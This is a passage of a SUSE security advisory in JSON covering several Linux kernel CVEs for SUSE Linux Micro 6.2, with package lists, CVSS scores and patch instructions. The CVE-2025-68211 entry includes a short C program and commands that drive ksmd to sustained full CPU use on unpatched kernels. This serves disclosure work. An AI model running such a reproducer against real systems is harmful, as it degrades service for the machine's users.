"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68188",
"url": "https://www.suse.com/security/cve/CVE-2025-68188"
},
{
"category": "external",
"summary": "SUSE Bug 1255269 for CVE-2025-68188",
"url": "https://bugzilla.suse.com/1255269"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68188"
},
{
"cve": "CVE-2025-68200",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68200"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Add bpf_prog_run_data_pointers()\n\nsyzbot found that cls_bpf_classify() is able to change\ntc_skb_cb(skb)-\u003edrop_reason triggering a warning in sk_skb_reason_drop().\n\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 __sk_skb_reason_drop net/core/skbuff.c:1189 [inline]\nWARNING: CPU: 0 PID: 5965 at net/core/skbuff.c:1192 sk_skb_reason_drop+0x76/0x170 net/core/skbuff.c:1214\n\nstruct tc_skb_cb has been added in commit ec624fe740b4 (\"net/sched:\nExtend qdisc control block with tc control block\"), which added a wrong\ninteraction with db58ba459202 (\"bpf: wire in data and data_end for\ncls_act_bpf\").\n\ndrop_reason was added later.\n\nAdd bpf_prog_run_data_pointers() helper to save/restore the net_sched\nstorage colliding with BPF data_meta/data_end.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68200",
"url": "https://www.suse.com/security/cve/CVE-2025-68200"
},
{
"category": "external",
"summary": "SUSE Bug 1255241 for CVE-2025-68200",
"url": "https://bugzilla.suse.com/1255241"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68200"
},
{
"cve": "CVE-2025-68211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nksm: use range-walk function to jump over holes in scan_get_next_rmap_item\n\nCurrently, scan_get_next_rmap_item() walks every page address in a VMA to\nlocate mergeable pages. This becomes highly inefficient when scanning\nlarge virtual memory areas that contain mostly unmapped regions, causing\nksmd to use large amount of cpu without deduplicating much pages.\n\nThis patch replaces the per-address lookup with a range walk using\nwalk_page_range(). The range walker allows KSM to skip over entire\nunmapped holes in a VMA, avoiding unnecessary lookups. This problem was\npreviously discussed in [1].\n\nConsider the following test program which creates a 32 TiB mapping in the\nvirtual address space but only populates a single page:\n\n#include \u003cunistd.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/mman.h\u003e\n\n/* 32 TiB */\nconst size_t size = 32ul * 1024 * 1024 * 1024 * 1024;\n\nint main() {\n char *area = mmap(NULL, size, PROT_READ | PROT_WRITE,\n MAP_NORESERVE | MAP_PRIVATE | MAP_ANON, -1, 0);\n\n if (area == MAP_FAILED) {\n perror(\"mmap() failed\\n\");\n return -1;\n }\n\n /* Populate a single page such that we get an anon_vma. */\n *area = 0;\n\n /* Enable KSM. */\n madvise(area, size, MADV_MERGEABLE);\n pause();\n return 0;\n}\n\n$ ./ksm-sparse \u0026\n$ echo 1 \u003e /sys/kernel/mm/ksm/run \n\nWithout this patch ksmd uses 100% of the cpu for a long time (more then 1\nhour in my test machine) scanning all the 32 TiB virtual address space\nthat contain only one mapped page. This makes ksmd essentially deadlocked\nnot able to deduplicate anything of value. With this patch ksmd walks\nonly the one mapped page and skips the rest of the 32 TiB virtual address\nspace, making the scan fast using little cpu.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
